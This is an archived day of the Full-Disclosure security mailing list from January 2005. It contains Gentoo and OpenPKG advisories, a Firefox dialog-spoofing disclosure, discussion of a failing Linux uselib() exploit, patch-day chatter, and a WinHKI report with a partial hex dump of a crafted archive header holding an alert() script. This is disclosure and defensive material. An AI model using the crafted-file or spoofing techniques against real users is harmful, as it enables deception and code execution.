pgpEhZr4PiCcd.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-11 Thread Athanasius 
On Tue, Jan 11, 2005 at 07:56:32AM +, Marcy Darcy wrote:
> I'm running a small server with the 2.6.10 kernel.
> 
> The exploit doesen't seem to be working on this kernel. Is there a way
> to make sure the sistem is vulnerable or not?

  I couldn't get the exploit to work for 2.6.10 either.  First there's
changing a struct in it to user_desc to make it compile, then it just
SEGVs all the time here.
  This is quite apart from the fact it's trying to exploit a race
condition and as such can take a lot of attempts in a loop to actually
work anyway (must have hit it on the 50th or more iteration on my 2.4.28
machine).
  Anyone got working exploit code for 2.6.10 ?

-Ath
-- 
- Athanasius = Athanasius(at)miggy.org / http://www.miggy.org/
  Finger athan(at)fysh.org for PGP key
   "And it's me who is my enemy. Me who beats me up.
Me who makes the monsters. Me who strips my confidence." Paula Cole - ME


pgpPqqAVuKTpI.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Firespoofing [Firefox 1.0]

2005-01-11 Thread Soderland, Craig 
This does not work if you are using the FireFox 1.0 tabbed browsing
feature, as your pop up window simply opens a new tab, and it then
becomes immediately obvious what you are trying to pull off here. 



> -Original Message-
> From: [EMAIL PROTECTED]
[mailto:full-disclosure-
> [EMAIL PROTECTED]
> Sent: Monday, January 10, 2005 6:22 PM
> To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
> [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Firespoofing [Firefox 1.0]
> 
> __Summary
> 
> Using javascript it is possible to spoof the content of security and
> download dialogs by partly covering them with a popup window. This can
> fool
> a user to download and automaticly execute a file (if a file extension
> association exists) or to grant a script local data access (if
codebase
> principals are enabled).
> 
> __Expected Behavior
> 
> Modal dialogs should always be on top and it should not be possible to
> obfuscate their appearance.
> 
> __Proof-of-Concept
> 
> http://www.mikx.de/firespoofing/
> 
> The PoC is designed for Firefox 1.0 running in a maximized window.
> 
> Part 1 - download dialog spoofing
> Shows how to cover a download dialog and fool the user to execute a
file
> with a standard windows file association (in this case a .ht file).
BTW,
> remember the latest .ht buffer overflow...
> 
> Part 2 - security dialog spoofing
> Shows how to cover a security dialog. Make sure codebase principals
are
> enabled (not default but encouraged by many XUL sites). Creates the
file
> c:\booom.txt to proof local system access.
> 
> __Status
> 
> The bug is confirmed but currently unfixed (open for more than 3
months).
> As
> a partial workaround set dom.disable_window_flip to true in
about:config.
> The vendor failed to respond to multiple status requests which led to
this
> public disclosure.
> 
> 2004-09-20 Vendor informed (bugzilla.mozilla.org #260560)
> 2004-09-20 Vendor confirmed bug
> 2004-10-20 Status request (open for 1 month - no reply)
> 2005-01-03 Status request (open for 3 months - no reply)
> 2005-01-07 Status request (disclosure warning - no reply)
> 2005-01-11 Public disclosure
> 
> __Affected Software
> 
> Tested with Firefox 1.0, Mozilla 1.7.5 and Netscape 7.1 on Windows XP
SP2.
> 
> __Contact Informations
> 
> Michael Krax <[EMAIL PROTECTED]>
> http://www.mikx.de/?p=7
> 
> mikx
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Mike Diack 
Where are they?
Mike
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Shoe 1.0 - Remote Lace Overflow

2005-01-11 Thread stonersavant 
I tested this in my lab. I'm happy to report that s10.5 Ninja Tabi
boots appear to be unaffected by the vulnerability.

savant
http://johnny.ihackstuff.com

On Sun, 26 Dec 2004 19:45:54 -0500, Nancy Kramer
<[EMAIL PROTECTED]> wrote:
> The points on cowboy boots are also great for stepping on cockroaches in
> corners thereby helping one maintain a bug free environment.
> 
> Regards,
> 
> Nancy Kramer
> Webmaster http://www.americandreamcars.com
> Free Color Picture Ads for Collector Cars
> One of the Ten Best Places To Buy or Sell a Collector Car on the Web
> 
> 
> At 06:49 PM 12/25/2004, Thomas Sutpen wrote:
> 
> >On Wed, 22 Dec 2004 11:20:45 -0500, [EMAIL PROTECTED] <[EMAIL PROTECTED]>
> >wrote:
> >[...]
> > >  Vulnerable Sizes:
> > >  -
> > >  6 through 13. Other sizes may be vulnerable, but were unavailable for
> > testing.
> >
> >Cursory note:  The guy with the size 13s must get all the chicks.  You
> >know what they say 
> >
> >[...]
> >
> > >  Fix:
> > >  
> > >  Do not wear untrusted shoes sent to you. Other possible workarounds
> > include
> > >  sandals (aka. flip-flops). These are a good work-around and are widely
> > >  available for those concerned about their security.
> >
> >Merrell also makes a "Jungle Moc" that is a mitigating factor to this
> >vulnerability.  All shoes of similar "Moccasin" styles, as well as
> >Cowboy Boots, also seem to be unaffected.  Cowboy Boots with spurs
> >seem to add an additional layer of security, as well as cool points.
> >
> >Review of their website seems to indicate that they're going to be
> >discontinuing the line, though.  So, with Boxing Day tommorrow, I'd
> >recommend snapping up a few pairs as a cautionary posture against the
> >possibility of future attacks.
> >
> >[...]
> >
> >TS
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >
> >
> >---
> >Incoming mail is certified Virus Free.
> >Checked by AVG anti-virus system (http://www.grisoft.com).
> >Version: 6.0.822 / Virus Database: 560 - Release Date: 12/22/2004
> 
> 
> 
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.822 / Virus Database: 560 - Release Date: 12/22/2004
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> 
> 


-- 
someone is watching you.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [OpenPKG-SA-2005.001] OpenPKG Security Advisory (perl)

2005-01-11 Thread OpenPKG 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html  http://www.openpkg.org
[EMAIL PROTECTED] [EMAIL PROTECTED]
OpenPKG-SA-2005.001  11-Jan-2005


Package: perl
Vulnerability:   information disclosure, insecure permissions
OpenPKG Specific:no

Affected Releases:   Affected Packages:  Corrected Packages:
OpenPKG CURRENT  <= perl-5.8.6-20041129  >= perl-5.8.6-20050111
OpenPKG 2.2  <= perl-5.8.5-2.2.0 >= perl-5.8.5-2.2.1
OpenPKG 2.1  <= perl-5.8.4-2.1.0 >= perl-5.8.4-2.1.1

Dependent Packages:  none

Description:
  Jeroen van Wolffelaar discovered that the rmtree() function in the
  Perl [0] File::Path module removes directory trees in an insecure
  manner which could lead to the removal of arbitrary files and
  directories through a symlink attack. The Common Vulnerabilities and
  Exposures (CVE) project assigned the id CAN-2004-0452 [1] to the
  problem.

  Trustix developers discovered several insecure uses of temporary files
  in many modules which allow a local attacker to overwrite files via a
  symlink attack. The Common Vulnerabilities and Exposures (CVE) project
  assigned the id CAN-2004-0976 [2] to the problem.

  Please check whether you are affected by running "/bin/openpkg
  rpm -q perl". If you have the "perl" package installed and its version
  is affected (see above), we recommend that you immediately upgrade it
  (see Solution) [3][4].

Solution:
  Select the updated source RPM appropriate for your OpenPKG release
  [5][6], fetch it from the OpenPKG FTP service [7][8] or a mirror
  location, verify its integrity [9], build a corresponding binary RPM
  from it [3] and update your OpenPKG installation by applying the
  binary RPM [4]. For the most recent release OpenPKG 2.2, perform the
  following operations to permanently fix the security problem (for
  other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/2.2/UPD
  ftp> get perl-5.8.5-2.2.1.src.rpm
  ftp> bye
  $ /bin/openpkg rpm -v --checksig perl-5.8.5-2.2.1.src.rpm
  $ /bin/openpkg rpm --rebuild perl-5.8.5-2.2.1.src.rpm
  $ su -
  # /bin/openpkg rpm -Fvh /RPM/PKG/perl-5.8.5-2.2.1.*.rpm


References:
  [0] http://www.perl.com/
  [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0452
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0976
  [3] http://www.openpkg.org/tutorial.html#regular-source
  [4] http://www.openpkg.org/tutorial.html#regular-binary
  [5] ftp://ftp.openpkg.org/release/2.2/UPD/perl-5.8.5-2.2.1.src.rpm
  [6] ftp://ftp.openpkg.org/release/2.1/UPD/perl-5.8.4-2.1.1.src.rpm
  [7] ftp://ftp.openpkg.org/release/2.2/UPD/
  [8] ftp://ftp.openpkg.org/release/2.1/UPD/
  [9] http://www.openpkg.org/security.html#signature


For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.


-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFB4+wMgHWT4GPEy58RAmB8AJ9RXjXuF4foXhhDAvR4KRRJ31dUBwCg6pRb
TZQ44p6zfBdfieRvvcf3QLo=
=CkBO
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ GLSA 200501-19 ] imlib2: Buffer overflows in image decoding

2005-01-11 Thread Dan Margolis 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: imlib2: Buffer overflows in image decoding
  Date: January 11, 2005
  Bugs: #77002
ID: 200501-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple overflows have been found in the imlib2 library image decoding
routines, potentially allowing the execution of arbitrary code.

Background
==

imlib2 is an advanced replacement for image manipulation libraries such
as libXpm. It is utilized by numerous programs, including gkrellm and
several window managers, to display images.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  media-libs/imlib2   < 1.2.0  >= 1.2.0

Description
===

Pavel Kankovsky discovered that several buffer overflows found in the
libXpm library (see GLSA 200409-34) also apply to imlib (see GLSA
200412-03) and imlib2. He also fixed a number of other potential
security vulnerabilities.

Impact
==

A remote attacker could entice a user to view a carefully-crafted image
file, which would potentially lead to the execution of arbitrary code
with the rights of the user viewing the image. This affects any program
that utilizes of the imlib2 library.

Workaround
==

There is no known workaround at this time.

Resolution
==

All imlib2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/imlib2-1.2.0"

References
==

  [ 1 ] CAN-2004-1026
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1026
  [ 2 ] GLSA 200412-03
http://security.gentoo.org/glsa/glsa-200412-03.xml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-19.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



pgpR3u2bsNsBd.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Firespoofing [Firefox 1.0]

2005-01-11 Thread James Greenhalgh 
Soderland, Craig wrote:
This does not work if you are using the FireFox 1.0 tabbed browsing
feature, as your pop up window simply opens a new tab, and it then
becomes immediately obvious what you are trying to pull off here. 
It also doesn't work on non-Windows or with non-default colours.
Really - this is more a window management thing surely?  If someone fell 
for this, they'd deserve it to be honest.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ GLSA 200501-20 ] o3read: Buffer overflow during file conversion

2005-01-11 Thread Thierry Carrez 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: o3read: Buffer overflow during file conversion
  Date: January 11, 2005
  Bugs: #74478
ID: 200501-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow in o3read allows an attacker to execute arbitrary
code by way of a specially crafted XML file.

Background
==

o3read is a standalone converter for OpenOffice.org files. It allows a
user to dump the contents tree (o3read) and convert to plain text
(o3totxt) or to HTML (o3tohtml) Writer and Calc files.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  app-text/o3read  <= 0.0.3>= 0.0.4

Description
===

Wiktor Kopec discovered that the parse_html function in o3read.c copies
any number of bytes into a 1024-byte t[] array.

Impact
==

Using a specially crafted file, possibly delivered by e-mail or over
the Web, an attacker may execute arbitrary code with the permissions of
the user running o3read.

Workaround
==

There is no known workaround at this time.

Resolution
==

All o3read users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/o3read-0.0.4"

References
==

  [ 1 ] CAN-2004-1288
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1288
  [ 2 ] Wiktor Kopec advisory
http://tigger.uic.edu/~jlongs2/holes/o3read.txt

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-20.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-11 Thread Gaz Wilson 
On Tue, 11 Jan 2005, Athanasius wrote:

> On Tue, Jan 11, 2005 at 07:56:32AM +, Marcy Darcy wrote:
> > I'm running a small server with the 2.6.10 kernel.
> >
> > The exploit doesen't seem to be working on this kernel. Is there a way
> > to make sure the sistem is vulnerable or not?
>
>   I couldn't get the exploit to work for 2.6.10 either.  First there's
> changing a struct in it to user_desc to make it compile, then it just
> SEGVs all the time here.

I get it compiled and running on 2.6.8, but it doesn't do anything, other
than hog all available CPU for about 10-15 minutes followed by:

[-] FAILED: try again (-f switch) and again (Cannot allocate memory)
Killed

The same thing happens with the -f switch, except the process gets stopped
(SIGSTOP) instead of killed after the alloted time.

-- 
   /   Gary Wilson, aka dragon/dragonlord/dragonv480\
 .'(_.--.  e: [EMAIL PROTECTED] MSN: dragonv480   .--._)`.
<   _   |  Skype:dragonv480 ICQ:342070475 AIM:dragonv480   |   _   >
 `.( `--' w: http://volvo480.northernscum.org.uk   `--' ).'
   \w: http://www.northernscum.org.uk   /
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

2005-01-11 Thread Rafel Ivgi 
The original file wasn't a 1.56 with null that were compressed, it was a 
smal file with 1024 FF's which was extracted to a
1.56 of nulls...that is not obvious, that is a bug.

Rafel Ivgi
Security Consultant
- Original Message - 
From: "bipin gautam" <[EMAIL PROTECTED]>
To: 
Sent: Saturday, January 08, 2005 11:29 AM
Subject: Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB


that's obvious isn't it... say... if you create a few
GB file with null characters, 0X00 and compress
it.. that will produce a similar result. such
issue is known for any file compress utility for ages.
any... software will do the same! try it. and THAT'S
OBVIOUS!
--- "Rafel Ivgi, The-Insider" <[EMAIL PROTECTED]>
wrote:

~~~
Application:WinHKI
Vendors:http://www.webtoolmaster.com
Versions:   1.4d
Platforms:  Windows
Bug:ARC File Extraction of 1KB to 1.56GB
Exploitation:   Local (extract file)
Date:   24 Dec 2004
Author: Rafel Ivgi, The-Insider
E-Mail: [EMAIL PROTECTED]
Website:http://theinsider.deep-ice.com

~~~
1) Introduction
2) Bugs
3) The Code

~~~
===
1) Introduction
===
WinHKI is a file archiever which supports: ARC, BH,
CAB, HKI, JAR, LHA,TAR,
GZ compressions.

~~~
==
2) Bug
==
This is a normal CAB compressed file header
 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B
..251.HTM.^.
0010  0078 3139 73B5 121B  003C 7363
...x19s..alert()
By adding after the filename header a certain amount
of chars
and replacing all nulls (00) with FF (in order to
avoid our
long string from being terminated)
 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF
..251.HTM.^.
0010        

0020        

0030        

0040        

0050        

0060        

0070        

0080        

0090        

00A0        

00B0        

00C0        

00D0        

00E0        

00F0        

0100        

0110        

0120        

0130        

0140        

0150        

0160        

0170        

0180        

0190        

01A0        

01B0        

01C0        

01D0        

01E0        

01F0        

0200        

0210        

0220        

0230        

0240        

0250        

0260        

0270        

0280        

0290        

02A0        

02B0        

02C0        

02D0        

02E0

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Matt Ostiguy 
On Tue, 11 Jan 2005 15:13:45 -, Mike Diack <[EMAIL PROTECTED]> wrote:
> Where are they?
> Mike
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

My experience has been that the 2nd tuesday of the month patch drop
occurs late in the day or evening, Eastern Standard Time.

Matt
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

2005-01-11 Thread Handy, Mark (IT) 
It is Tuesday.

As mentioned before, mid-afternoon EST 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Vincent
Archer
Sent: 11 January 2005 11:11
To: Mike Diack
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
securitypatches today (11 Jan 2005)?

On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

--
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html 

 
NOTICE: If received in error, please destroy and notify sender.  Sender does 
not waive confidentiality or privilege, and use is prohibited. 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Vincent Archer 
On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ GLSA 200501-21 ] HylaFAX: hfaxd unauthorized login vulnerability

2005-01-11 Thread Thierry Carrez 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: HylaFAX: hfaxd unauthorized login vulnerability
  Date: January 11, 2005
  Bugs: #75941
ID: 200501-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


HylaFAX is subject to a vulnerability in its username matching code,
potentially allowing remote users to bypass access control lists.

Background
==

HylaFAX is a software package for sending and receiving facsimile
messages.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  net-misc/hylafax < 4.2.0-r2   >= 4.2.0-r2

Description
===

The code used by hfaxd to match a given username and hostname with an
entry in the hosts.hfaxd file is insufficiently protected against
malicious entries.

Impact
==

If the HylaFAX installation uses a weak hosts.hfaxd file, a remote
attacker could authenticate using a malicious username or hostname and
bypass the intended access restrictions.

Workaround
==

As a workaround, administrators may consider adding passwords to all
entries in the hosts.hfaxd file.

Resolution
==

All HylaFAX users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/hylafax-4.2.0-r2"

Note: Due to heightened security, weak entries in the hosts.hfaxd file
may no longer work. Please see the HylaFAX documentation for details of
accepted syntax in the hosts.hfaxd file.

References
==

  [ 1 ] CAN-2004-1182
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1182
  [ 2 ] HylaFAX Announcement
http://marc.theaimsgroup.com/?l=hylafax&m=110545119911558&w=2

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-21.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Danny 
On Tue, 11 Jan 2005 15:13:45 -, Mike Diack <[EMAIL PROTECTED]> wrote:
> Where are they?

They are probably patching their patch release system. :)

Expect them in a couple of hours. Patience grasshopper, patience...

...D
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread vh 
On Tue, 11 Jan 2005 15:13:45 -
"Mike Diack" <[EMAIL PROTECTED]> wrote:

> Where are they?
> Mike

Start using OpenSource-OSs then you would be able to write the patches
yourself if nobody cares for the security-holes.
Microsoft don't care for ANY guy who buy an MS-OS if this guy is no CEO
or any other person of any big company.

Don't count the patches...
Count the security holes they didn't patched.


vH


pgpfCnNnntcNL.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

2005-01-11 Thread Larry Seltzer 
Tuesday, 1PM eastern

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread James Patterson Wicks 
It's just 8:55 on the West Coast.  Let Bill get a cup of coffee and
check his email first!  :)


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Vincent
Archer
Sent: Tuesday, January 11, 2005 11:11 AM
To: Mike Diack
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
security patches today (11 Jan 2005)?

On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


This e-mail is the property of Oxygen Media, LLC.  It is intended only for the 
person or entity to which it is addressed and may contain information that is 
privileged, confidential, or otherwise protected from disclosure. Distribution 
or copying of this e-mail or the information contained herein by anyone other 
than the intended recipient is prohibited. If you have received this e-mail in 
error, please immediately notify us by sending an e-mail to [EMAIL PROTECTED] 
and destroy all electronic and paper copies of this e-mail.



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] I thought Microsoft were releasing new secu rity patches today (11 Jan 2005)?

2005-01-11 Thread Randal, Phil 
Looking at

 
http://www.microsoft.com/downloads/results.aspx?sortCriteria=date&freete
xt=security

should reveal all.

The Security Bulletins and KB articles aren't up yet, though.

Phil

Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of James Patterson Wicks
> Sent: 11 January 2005 16:56
> Cc: full-disclosure@lists.netsys.com
> Subject: RE: [Full-Disclosure] I thought Microsoft were 
> releasing new security patches today (11 Jan 2005)?
> 
> It's just 8:55 on the West Coast.  Let Bill get a cup of 
> coffee and check his email first!  :)
> 
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Vincent Archer
> Sent: Tuesday, January 11, 2005 11:11 AM
> To: Mike Diack
> Cc: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] I thought Microsoft were 
> releasing new security patches today (11 Jan 2005)?
> 
> On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> > Where are they?
> > Mike
> 
> Thursday usually, not tuesday?
> 
> --
> Vincent ARCHER
> [EMAIL PROTECTED]
> 
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> 
> This e-mail is the property of Oxygen Media, LLC.  It is 
> intended only for the person or entity to which it is 
> addressed and may contain information that is privileged, 
> confidential, or otherwise protected from disclosure. 
> Distribution or copying of this e-mail or the information 
> contained herein by anyone other than the intended recipient 
> is prohibited. If you have received this e-mail in error, 
> please immediately notify us by sending an e-mail to 
> [EMAIL PROTECTED] and destroy all electronic and paper 
> copies of this e-mail.
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] FW: MS Antispyware makes deal to leave Weatherbug alone

2005-01-11 Thread Todd Towles 
 And the money payoff begins..

> -Original Message-
> From: jaynine [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, January 11, 2005 6:48 AM
> To: Patch Management Mailing List
> Subject: MS Antispyware makes deal to leave Weatherbug alone
> 
> I read this rather disturbing article on another tech list. 
> Pardon me if someone here has already made reference to it.
> 
> --- j9
> 
> http://netrn.net/spywareblog/archives/2005/01/07/adware-vs-microsoft/
> 
> 1/7/2005
> Adware vs. Microsoft
> 
> It's started folks. WeatherBug Miffed at Microsoft's Spyware 
> Classification .
> 
> Microsoft Corp.'s newly released anti-spyware is flagging a 
> component of AWS Convergence Technologies' WeatherBug 
> application as a threat to Windows users, prompting an 
> immediate complaint from the Gaithersburg, Md.-based company.
> 
> It appears this dispute has been resolved already: A 
> Microsoft spokeswoman said the beta product included a vendor 
> dispute-resolution mechanism to deal with complaints from 
> third-party companies.
> 
> In the case of WeatherBug, the dispute-resolution process 
> paid immediate dividends. On Friday, the company received a 
> response from Microsoft with the good news that the current 
> signatures for Minibug will be removed.
> 
> 
> 
> 
> 
> ---
> To unsubscribe send a blank email to 
> [EMAIL PROTECTED]
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread ASB 
Yeah, because everyone is a kernel developer.


To answer the original question, the patches are released approx 1pm
EST on the 2nd Tuesday of each month.


-ASB
 FAST, CHEAP, SECURE: Pick Any TWO
 http://www.ultratech-llc.com/KB/



On Tue, 11 Jan 2005 17:38:09 +0100, vh <[EMAIL PROTECTED]> wrote:
> On Tue, 11 Jan 2005 15:13:45 -
> "Mike Diack" <[EMAIL PROTECTED]> wrote:
> 
> > Where are they?
> > Mike
> 
> Start using OpenSource-OSs then you would be able to write the patches
> yourself if nobody cares for the security-holes.
> Microsoft don't care for ANY guy who buy an MS-OS if this guy is no CEO
> or any other person of any big company.
> 
> Don't count the patches...
> Count the security holes they didn't patched.
> 
> 
> vH
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Firespoofing [Firefox 1.0]

2005-01-11 Thread Andrew Clover 
James Greenhalgh <[EMAIL PROTECTED]> wrote:
